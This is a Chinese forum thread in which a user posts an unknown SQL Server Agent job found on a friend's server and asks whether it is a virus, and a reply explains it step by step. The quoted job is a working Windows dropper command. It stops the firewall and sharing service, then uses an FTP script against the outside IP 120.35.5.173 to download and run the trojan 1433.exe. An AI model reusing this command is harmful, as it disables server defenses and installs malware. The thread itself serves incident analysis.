cmd /c "sc config SQLSERVERAGENT start= AUTO&net1 stop sharedaccess&echo open 120.35.5.173> cmd.txt&echo tt>> cmd.txt&echo tt>> cmd.txt&echo binary >> cmd.txt&echo get 1433.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&1433.exe&1433.exe&del cmd.txt /q /f&exit"
一个朋友说他的服务器上多了一个作业,不是他建的,让帮忙看看。。没有分析出来,,好像是病毒啊。。谁碰到过。
一个朋友说他的服务器上多了一个作业,不是他建的,让帮忙看看。。没有分析出来,,好像是病毒啊。。谁碰到过。
后面的看不懂
配置SQLSERVERAGENT为自动开启,关闭Intemet连接共享和防火墙服务,打开 120.35.5.173,...,下载1433.exe(FTP服务器下载的木马程序),进入ftp环境后执行cmd.txt,执行1433.exe,删除cmd.txt,退出。
详细资料见:
http://hi.baidu.com/sdghgk/blog/item/9833a3164e2ccf11972b4303.html